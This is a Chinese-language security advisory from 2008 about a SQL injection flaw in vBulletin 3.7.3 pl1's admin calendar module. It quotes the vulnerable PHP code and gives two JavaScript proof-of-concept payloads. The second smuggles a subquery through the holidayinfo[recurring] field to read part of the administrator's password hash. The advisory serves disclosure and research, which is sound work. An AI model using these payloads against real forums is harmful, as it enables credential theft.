首页 -> 安全研究

安全研究

安全漏洞
vBulletin admincp/admincalendar.php模块SQL注入漏洞

发布日期:2008-11-17
更新日期:2008-11-18

受影响系统:
VBulletin VBulletin 3.7.3 pl1
描述:
BUGTRAQ  ID: 32348

vBulletin是一款开放源代码的PHP论坛程序。

vBulletin论坛的admincp/admincalendar.php文件没有正确地验证用户提交参数:

-------------------[original source code]------------------

if($_POST['do'] == 'saveholiday')
{
    $vbulletin->input->clean_array_gpc('p', array(
        'holidayid'   => TYPE_INT,
        'holidayinfo' => TYPE_ARRAY,
        'month1'      => TYPE_INT,
        'day1'        => TYPE_INT,
        'month2'      => TYPE_INT,
        'day2'        => TYPE_INT,
        'period'      => TYPE_INT,
        'title'       => TYPE_STR,
        'description' => TYPE_STR,
    ));
..
$db->query_write("
        UPDATE " . TABLE_PREFIX . "holiday
        SET allowsmilies = " . $vbulletin->GPC['holidayinfo']['allowsmilies'] . ",
        recuroption = '" . $vbulletin->GPC['holidayinfo']['recuroption'] . "',
        recurring = " . $vbulletin->GPC['holidayinfo']['recurring'] . "
        WHERE holidayid = " . $vbulletin->GPC['holidayid']
    );

------------------[/original source code]------------------

可见未经任何过滤便在UPDATE查询中使用了来自$_POST的数组类型变量holidayinfo,这允许远程攻击者通过提交恶意请求执行SQL注入攻击。

<*来源:Janek Vind (come2waraxe@yahoo.com
  
  链接:http://marc.info/?l=bugtraq&m=122693915030370&w=2
        http://secunia.com/advisories/32735/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

PoC #1

以管理员身份登录并打开假日管理器界面:

http://localhost/vbulletin373pl1/admincp/admincalendar.php?do=updateholiday

以任意内容填充title字段,然后通过浏览器URL栏运行以下javascript:

javascript:var w=document.getElementsByName("holidayinfo[recurring]")[0];
w.value="6,waraxe=1";document.cpform.submit();

PoC #2

以管理员身份登录并打开假日管理器界面。填充title字段然后执行以下javascript:

javascript:var w=document.getElementsByName("holidayinfo[recurring]")[0];
w.value="6,recuroption=CONCAT('|',(SELECT SUBSTR(password,1,5) FROM vb_user WHERE userid=1))";
document.cpform.submit();

建议:
厂商补丁:

VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.vbulletin.com/

浏览次数:3656
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障